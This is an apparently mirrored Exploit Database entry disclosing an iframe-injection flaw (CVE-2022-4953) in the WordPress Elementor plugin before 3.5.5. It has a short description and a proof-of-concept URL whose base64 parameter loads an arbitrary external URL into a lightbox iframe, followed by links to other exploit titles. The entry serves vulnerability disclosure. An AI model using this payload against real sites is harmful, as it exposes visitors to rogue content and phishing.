WordPress Plugin Elementor 3.5.5 – Iframe Injection

Exploit Database
106 阅读

作者： Miguel Santareno

日期： 2023-09-08
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/51716/

# Exploit Title: WordPress Plugin Elementor < 3.5.5 - Iframe Injection
# Date: 28.08.2023
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://elementor.com/
# Version: < 3.5.5
# Tested on: Google and Firefox latest version
# CVE : CVE-2022-4953

# 1. Description
The plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.


# 2. Proof of Concept (PoC)
Proof of Concept:
https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K

last Exploits
WordPress Plugin Elementor 3.5.5 – Iframe Injection的更多信息

Site to Store Automobile – Motorcycle Boat SQL Injection：
FileCloud 21.2 – Cross-Site Request Forgery (CSRF)：
Allomani News 1.0 – Cross-Site Request Forgery (Add Admin)：
Alumni Management System 1.0 – Unrestricted File Upload To RCE：
F3Site 2011 alfa 1 – Cross-Site Scripting / Cross-Site Request Forgery：
PHPCalendars – Multiple Vulnerabilities：
WordPress Plugin WP Live.php 1.2.1 – ‘s’ Cross-Site Scripting：
D-Link DIR601 2.02 – Credential Disclosure：